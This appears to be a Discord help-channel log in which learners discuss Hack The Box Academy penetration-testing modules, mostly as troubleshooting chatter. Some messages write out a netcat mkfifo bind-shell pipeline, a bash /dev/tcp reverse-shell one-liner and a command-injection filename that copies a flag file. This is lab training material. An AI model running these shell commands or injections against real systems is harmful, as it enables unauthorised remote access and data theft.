#

Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?

vital adder
#

if subbrute are too slow use gobuster but if you can't find it with gobuster use subbrute and remember to use the custom name server

knotty crag
#

.

grave dust
deep delta
#

im stuck on the skills assessment for the lfi module and i know you have to log poisen but i can't seem to be able to lfi to the log file: ilf_admin/index.php?log=/var/log/apache2/access.log

burnt shore
#

can anybody tell me how to recover facebook id if forget the password

deep delta
#

i can get the passwd file

#

nothing else though

dense ferry
#

Are you sure the server is apache2 and not something else?

deep delta
#

what else could it be?

dense ferry
deep delta
#

yeah i found out its Nginx

boreal vine
#

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

deep delta
#

the log files

feral stump
#

Hi there everyone!

I have a couple of questions regarding the imap/pop3 footprinting assessment

#

I have completed all the questions successfully but I am not sure I understand some of the commands I used

For example 1 fetch <Id> which is detailed in the module of HTB what is Id exactly? Searching the web I used ||1 FETCH 1 Rfc|| and it worked once logged in the server but don’t exactly find out why?

#

If anyone could briefly explain I would appreciate that

hollow hinge
remote solar
#

Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?

remote solar
#

@summer lava I tried using John with the rockyou list to no avail

#

@summer lava Bruteforcing the NTLM hash takes too long ...

dense ferry
hollow hinge
final frigate
#

Hey, I'm struggling in the Documentation and Reporting module, the skills assesment, could anyone help?

summer lava
remote solar
#

@summer lava Thank you for your assistance. copied the hash values wrong. My bad

summer lava
remote solar
#

ay sir

onyx dust
grave dust
#

and i can't get password policy with tools such as ldapsearch or rpcclient

rugged stag
#

Haha, literally the same thing just happened to me. It didn't work, then I wen here looking for answers and I found yours. I respawned the machine and just repeated the exact same thing I did before (which didn't work) and all of a sudden it works like a charm...

onyx dust
#

from the linux machine on the domain

grave dust
onyx dust
#

o.O whaat

grave dust
#

it ran like 15min

onyx dust
#

wow that's so weird idk why it's not working.

#

that is not normal behavior

grave dust
#

ok thx

#

maybe put it as spoiler

onyx dust
#

so i ran responder and got a hash that i used hashcat on w/mode 5600

#

that's what comes out

#

idk how

grave dust
#

it's ||spoiler||

onyx dust
#

i just delete it nbd u seen it

dry talon
#

fresh 🙂

boreal vine
#

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

trail wren
knotty summit
#

help por favor

dense ferry
knotty summit
#

help por favor it for the simply answer in htb academy

fresh wedge
#

Can someone tell me where I can find sweet potato.exe or how to compile it into executable pls

deep delta
trail wren
#

For AD enumeration & attacks assessment part 2, submit the flag fin the administrators desktop on the sql01 host, should we be able to connect to it with mssqlclient.py?

rustic sage
#

I'm working my way through the Bash scripting module (module 21) and have the question Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
script removed
What is wrong with this? I am getting no output
*edit The question is WRONG, it is not more than 113,469 characters!

deep delta
trail spade
#

Hi, i'm actually doing the PASSWORD ATTACKS module and i'm blocked on the question " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer. " i used the ressources zip like they said. i tried different way but still got no result. may be i'm doing something wrong but can't tell what.

grave dust
trail wren
# fresh wedge Yea

I’m trying to connect from the Linux host they provide but getting a “login is from an untrusted domain” error, when i try to use mssqlclient

fresh wedge
#

Mssqlclient domain/user@serverip -dc-ip dcserverip

#

Don’t use .local in your cmd

trail wren
fresh wedge
#

Glad to help

shadow willow
#

Can somebody please help me ?
Iam stuck at the "Command Injection Skills Assessment"
I already found the injection point and i just get a "Permission denied"

west canopy
#

@shadow willow DM me 🙂

knotty summit
#

where is locate the wordlist with dirb i don't find

#

it is empty

#

when i go /usr/bin/wordlist

west canopy
#

@knotty summit its not here?

knotty summit
#

no i don't have the file dirb

west canopy
#

what happens if you run: locate dirb

knotty summit
#

it empty

west canopy
#

you can find the dirb wordlists on github if you need them

knotty summit
#

i tried

#

i must download every file on per one

#

how download the wordlist dirb ?

shadow willow
knotty summit
#

i don't know how download the complete wordlist

shadow willow
#

dirb is a directory „/usr/share/wordlist/dirb“
which wordlist do you mean ?

knotty summit
#

the whole wordlist

#

i don't have access to dirb

#

i have install dirb but i don't have thre complete repertory

#

only /usr/share/wordlist/

shadow willow
#

did you tried
cd /usr/share/wordlists/dirb/

ls

?

knotty summit
#

yes

#

i don't have dirb

#

it stop to /usr/share/wordlist

#

no dirb

shadow willow
#

sudo apt install dirb

cd /usr/share/wordlists/dirb/

i tried it out it works

knotty summit
#

I've already done ok it is a mystery

#

i don't understand why i don't have the repertory dirb

shadow willow
#

which Distro do you have ?

knotty summit
#

kali

dire sentinel
#

Shells and Payloads -> The Live Engagement, final host. Little stuck, enumerated and gained access via web shell to a user account but not sure how to escalate privileges. Tried the exploit it recommends too, fails. A hint or push in the right direction would be appreciated!

ebon valve
#

Hello, I have the Flag for one of the academy moduels i found but its not working idk

errant lava
#

How did you find the file to use for this? I cracked it with hash cat was just wondering how this method works tho.

ebon valve
#

Enumerate the hostname of your target and submit it as the answer. (case-sensitive) I got the HTB {answer}

#

but it isnt working

errant lava
#

Right, but what module?

errant lava
ebon valve
#

network enumeration

errant lava
#

You have to use namp to scan your target machine

lethal atlas
rustic sage
lethal atlas
rustic sage
#

Yeah, that's probably why they had trouble finding it!

lethal atlas
#

so you dont have /usr/share/wordlists?

rustic sage
#

I do

#

but dirb had to be different 🙄

lethal atlas
#

it was installed by default in all my vms

rustic sage
#

So you know I'm not making things up!

lethal atlas
#

lol I believed you just not sure why you had to install it to begin with

rustic sage
#

I didn't it was already there

lethal atlas
#

Litterally have never heard of that

#

where did you get your iso lol

rustic sage
summer lava
lethal atlas
sturdy agate
#

I have a question for the Attacking Common Services Lab - Easy. Would someone be able to assist please?

lethal atlas
rustic sage
# lethal atlas wow!! I just looked and have a dirb folder in /usr/share as well. but in wordl...

More than this then? ```──(kali㉿kali)-[/usr/share/dirb/wordlists]
└─$ tree
.
├── big.txt
├── catala.txt
├── common.txt
├── euskera.txt
├── extensions_common.txt
├── indexes.txt
├── mutations_common.txt
├── others
│   ├── best1050.txt
│   ├── best110.txt
│   ├── best15.txt
│   └── names.txt
├── small.txt
├── spanish.txt
├── stress
│   ├── alphanum_case_extra.txt
│   ├── alphanum_case.txt
│   ├── char.txt
│   ├── doble_uri_hex.txt
│   ├── test_ext.txt
│   ├── unicode.txt
│   └── uri_hex.txt
└── vulns
├── apache.txt
├── axis.txt
├── cgis.txt
├── coldfusion.txt
├── domino.txt
├── fatwire_pagenames.txt
├── fatwire.txt
├── frontpage.txt
├── hpsmh.txt
├── hyperion.txt
├── iis.txt
├── iplanet.txt
├── jboss.txt
├── jersey.txt
├── jrun.txt
├── netware.txt
├── oracle.txt
├── ror.txt
├── sap.txt
├── sharepoint.txt
├── sunas.txt
├── tests.txt
├── tomcat.txt
├── vignette.txt
├── weblogic.txt
└── websphere.txt

3 directories, 46 files

#

I haven't needed to use it yet, so I'm not sure if there is more I might need to get from somewhere

lethal atlas
#

they are identical directories

wind plaza
#

I am working on DNS Enumeration Using Python , when I finish the script it taught and run it, it raise the error : Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 982, in nameservers
raise NotImplementedError
NotImplementedError why does it happened?

lethal atlas
rustic sage
rustic sage
# lethal atlas

try adding -i to the ls commands and see if the inodes match

lethal atlas
#

they do

rustic sage
#

A looks like they are linked then

#

So they are not actually different files, but 2 different paths that point to the same files

grave epoch
#

I am having trouble with this question.

"To get the flag, start the above exercise, then use curl to download the file returned by 'download.php' in the server shown above."

I have been doing:

cURL -O IP:Port/download.php

How do I find the flag after that?

vital adder
vital adder
rustic sage
woven copper
#

Hey i wonder if anyone could help with the Active Directory LDAP module , the question What is the domain functional level?, I really don't know why my answer its not correct, i am using the same tools.
Edit: I found the answer, I really consider you may update that module, its very expensive , and the commands you put there are for the old version python2 from Windapsearch.

knotty dove
#

Can I get a hand with Broken Auth -> Predictable Reset Token?
I think I'm supposed to generate a token using the same timestamp as htbuser, but changing the username to make the token for htbadmin instead
When I find the timestamp for the token used in htbuser, it doesnt work for htbadmin
Am I misreading the question?

radiant dagger
#

didn't both of the highest ports are refuse to connect? Network issue. Working after reset machine

radiant dagger
#

I impersonate to that right user(previous question). But couldn't run EXECUTE sp_configure 'show advanced options', 1

radiant dagger
radiant dagger
#

tried ALTER DATABASE [yourDB] SET TRUSTWORTHY ON; not working either

acoustic owl
radiant dagger
#

Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.

acoustic owl
quaint marsh
#

for DnsAdmins module?

jaunty lantern
#

Hello

ebon coral
#

👋

analog yacht
potent pewter
#

hey can somebody help me out with the Local File inclusion skill assessment?

#

i've found the admin panel and i have access to the access.log file

#

i tried log poisoning i found that i can inject some text but not the cmd command

acoustic owl
potent pewter
#

Yes i tried it

potent pewter
#

hey I have found the solution. The issue was with my cmd command when I tried to install the webshell

heady hamlet
rustic sage
#

Can someone help me in the ACL abuse Tactics section in the Active directory enumeration and attacks module

west canopy
#

@rustic sage feel free to DM 🙂

fresh wedge
#

Ca. Someone nudge me in the right direction to get user hash for Active Directory skills II question 10 I am running inveigh from ms01 but gets nothing

light yacht
#

hello! I am stuck on the same point Is there any chance could you help me?

west canopy
#

Any Tmux users here? I have a question about how to do something

#

@light yacht i might be able to help!

raven cairn
light yacht
verbal eagle
west canopy
night pier
#

can anyone give me some help on Web Attacks Bypassing Encoded References ? I'm not getting a post request nor a modifiable variable when I intercept with Burp.

west canopy
#

@night pier i might be able to help 🙂

west canopy
fresh wedge
#

Anyone here on Active Directory skill 2?

#

Need help with question 10

shadow willow
#

Can anyone help me pls with "File Upload Attacks" Whitelist Filters ? 🙂
I uploaded my script with for example (shell.php%00.jpg) but i cant find it <.<

shadow willow
#

if i upload something like this:
testpic23.php/x00.png
And the server says "successful uploaded"
That would mean that i can find it with
profile_images/testpic23.php

Or am I wrong?

lethal atlas
shadow willow
deep flume
#

can anyone point me in the right direction for the Bypassing Encoded References module?

gray sundial
#

Good evening can I get some help on the: Information Gathering: Web Edition (module) --> Active Subdomain Enumeration ---> What is the FQDN of the IP address 10.10.34.136?

wind plaza
#

can anyone help me with this, I got the cubes but in a rude way.I think there's a better way for this

knotty dove
knotty dove
knotty dove
#

Good stuff

shadow willow
west canopy
#

@wind plaza sec i will DM you 🙂

teal talon
west canopy
#

sure

knotty dove
lethal atlas
onyx dust
#

do u have to do htb boxes to change the color of your discord name?

knotty dove
#

I think you can also do the challenges
Just need to do something that gets you score

onyx dust
#

ok tnx

ocean night
#

Solving active challenges and machines will contribute to your rank in HTB, will subsequently change your Discord colour AFAIK.

fresh wedge
#

anyone to offer help Active Directory skills 2 #10?

grave dust
#

crack the users password

fresh wedge
#

was trying to figure out how to get Inveigh to work

#

was cumbersome but got it from SQL01

radiant dagger
west canopy
#

@normal laurel ya dawg i got u 🙂

pure silo
#

Hey silly question here but for the SMTP footprinting section it says to use the provided wordlist to get the username. My issue is I haven’t a clue where that is. Would anybody mind telling me where it might be lmao

west canopy
#

@pure silo check the Resources at the top of the page

pure silo
#

I'm going to be completely honest but i had no clue that tab even existed

#

thank you

west canopy
#

lol np

lost tree
#

Hello, I'm new, and honestly I don't know much about programming, and I need to know what to start with and what things are important to know, could someone help me to guide me?

ebon coral
#

I think the intro to information security is a good starting point

lost tree
#

and i have troubles to download the vpn in the page

cosmic helm
#

what troubles

#

is it not letting you download it?

lost tree
#

yeah

#

it says its unavailable

cosmic helm
#

err

#

any ss?

#

whered u donwlaod from

lost tree
#

wdym, from the page lol

cosmic helm
#

weird

#

why would it say unavailable

#

are u being blocked

#

do u have permission to downlaod it in that location?

lost tree
cosmic helm
#

well any ss?

lost tree
#

ss?

cosmic helm
#

screenshot

lost tree
#

ohh xd wait

#

can they be sent here?}

fringe shell
#

Hi all, I'm on Windows Privilege Escalation Skills Assessment 1 and have managed foothold and root... but for the life of me cant find ldapadmin password. Any hints?

onyx dust
fringe shell
fringe shell
fossil adder
#

hi

bleak fern
#

Hi

fossil adder
#

yay I actually fixed the problem 🙂

rustic sage
steep marsh
#

can anyone help me, i'm new? how should i connect in the linux fundamentals modul with ssh when htb won't tell me any ip adress?

#

i only now user and password

#

*know

steep marsh
#

ah okay ty srry for bothering u@vital adder

feral stump
#

Hi!!! I’m at the MySQL footprinting last question

#

I understand what I have to do

#

But when I try to get to the database of the target ip

#

I’m getting an error related to my.cnf options

#

I have cat the file

#

But I’m not sure what I need to add/change to make possible the command for the target ip

#

Can anyone help?

#

This is the sS

#

Thanks!

feral stump
#

This is my.cnf file

maiden field
#

Hey for the information gathering - web edition module I have this question: Enumerate the target and find a vHost that contains flag No 1.

I try to enumerate with ffuf but I get 1907 results how can I know where are the flags ?

I’m doing this command btw: ffuf -w namelist.txt -u http://10.129.42.195 -H HOST: FUZZ.www.inlanefreight.htb -fs 612

pseudo kiln
#

Hey guys, can I DM someone for Windows Privilege Escalation Skills Assessment - Part I. I feel dumb...

placid quest
#

@maiden field try to get content-length using curl

maiden field
#

I don’t understand how to do this

acoustic owl
vital adder
#

oh that seem like a better way to do it

acoustic owl
#

I learned this trick in the Attacking Enterprise Networks module 🙂

maiden field
#

Ok thanks it give me a content-length but what am i suppose to do with this information ?

#

I’m sorry if my question is dumb but this module is really unclear for me

acoustic owl
#

You can use it to filter by content-length.
ffuf ... blah ... -fs <Content-Length>

maiden field
#

Oh

#

I see

#

But it give me no answer

#

Forgot about that

#

I did an error it work

#

Thanks a lot

summer lava
#
htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sudo nc -l 10.129.201.134 443 > /tmp/f

└─$ nc -nv 10.129.201.134 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connection refused.

Please what could be the reason.. i'm trying to get a bind shell

grave dust
#

i'm doing the password attack module and i'm running hashcat on unshadow file. it's like 30min/1h that i ran the cracking and it's only at 8%. am i missing something ?

summer lava
#

Does it seems like i'm been blocked by firewall or something ?

grave dust
summer lava
#

Like this ?

#
htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sudo nc -nv 10.10.15.99 443 > /tmp/f
└─$ nc -lnvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
boreal vine
#

I have some questions about the "ACL Enumeration" part of Active Directory Enumeration & Attacks, if anyone can help me ?

summer lava
grave dust
#

u can try a basic :
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#

but why are u trying to get a reverse shell on a machine that u already have a shell ?

summer lava
#

SHELLS & PAYLOADS module

grave dust
summer lava
#

SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.

grave dust
summer lava
#

i got the flag using just the ssh.. but i'm trying to get the point about bind shell

night pier
#

For anyone that's completed the AD module... the summary says 7 days, curious to know how long it's actually taken people.

west canopy
#

i think i managed to finish it in under a week , i had a decent amount of help though 🙂

grave dust
#

someone can help me on password attacking module ? cracking take forever idk if i'm doing something wrong

west canopy
#

@grave dust i might be able to help

grave dust
native comet
#

attacking common services dns section anyone help? i found some sub domains but cant transfer on them

west canopy
#

@native comet DM me 🙂

grave dust
lapis pivot
#

Hello everyone .. any one can help please ? Regarding bypassing security filter HTTP verb tempering

west canopy
#

There are a few more steps before we get root

grave dust
lapis pivot
#

Question saying ,, To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./

west canopy
#

oh yea we need -p to make it prompt for password

lapis pivot
west canopy
lapis pivot
#

I tried burp changed methods but not getting any back

west canopy
#

Did you right click or just change GET to POST by typing it in?

lapis pivot
#

Which Method it working ? I tried HEAD POST

#

Yes I did

west canopy
#

sec i'll DM

lapis pivot
#

K

rustic sage
#

no

lyric echo
#

Hey! Can someone help me with the Bruteforcing Cookies module : Question#2 . "Login to the application using the remember me token". I have the HTBPERSISTENT cookie but can just now figure out how to decode it it

lethal atlas
#

@lyric echo url>base64

lyric echo
# lethal atlas <@779192151401037835> url>base64

Thanks, I did try that combo as I seen the % in the original cookie. When I get the result, starting with an 'X', Im unsure if that is the right path or what im missing . following the Base64, I have tried combos of ROT, HEX, etc..

prisma spruce
#

Also, thinking of signing up for academy... just how many modules are there in total?

lethal atlas
lyric echo
lyric echo
prisma spruce
# lethal atlas 58 that I count

How much would it cost in total to do everything? I see that there are 11 fundamental, 16 easy, 28 medium, and 3 hard modules, but the website talks about pricing for module tiers instead.

#

Maybe I should just go and create an account to check things out.

lyric echo
#

@lethal atlas do you mean seperate the cookie from the colon following HTBPERSISTENT? or using a decoder delimiter of colon?

lethal atlas
errant moss
#

Need help with module Broken Authentication and its skill check. Found ways to enumerate usernames, and the hint about country codes. No luck finding anything. Put down some serious effort into the remember-me token, no luck. Can anyone help point me in the right direction or give me a hint?